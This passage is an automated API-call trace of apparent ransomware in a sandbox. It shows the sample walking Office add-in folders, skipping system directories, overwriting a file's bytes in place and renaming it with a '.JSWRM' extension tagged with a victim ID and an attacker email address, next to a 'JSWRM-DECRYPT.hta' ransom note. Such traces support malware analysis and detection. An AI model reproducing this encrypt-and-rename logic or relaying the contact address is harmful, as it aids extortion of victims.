ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4bc999b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.361] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0124.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0124.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0124.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0124.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.361] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x680214, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.361] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.361] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0124.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0124.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0124.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0124.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0124.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.362] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf311d3eb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf311d3eb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf311d3eb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x50a8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.362] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0124.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0124.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.363] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x146e0bdc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14969496, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50074, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ja.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2=".") returned 1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="..") returned 1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="...") returned 1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="windows") returned -1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="recovery") returned -1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="perflogs") returned 1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="documents and settings") returned 1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="system volume information") returned -1 [0124.363] lstrcmpiW (lpString1="PowerViewRes.ja.xap", lpString2="msocache") returned 1 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ja.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ja.xap", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ja.xap", lpUsedDefaultChar=0x0) returned 19 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ja.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0124.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ja.xap", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ja.xap", lpUsedDefaultChar=0x0) returned 19 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0124.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\PowerViewRes.ja.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ja\\powerviewres.ja.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.364] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=327796) returned 1 [0124.364] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.364] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.378] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.379] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.379] CloseHandle (hObject=0x338) returned 1 [0124.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0124.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0124.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0124.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0124.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0124.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.380] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\PowerViewRes.ja.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ja\\powerviewres.ja.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ja\\PowerViewRes.ja.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ja\\powerviewres.ja.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0124.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0124.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0124.381] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x146e0bdc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14969496, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50074, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ja.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.381] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0124.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0124.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.382] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40577766, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40577766, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40577766, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0124.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0124.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0124.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0124.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0124.383] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14b330aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="kk", 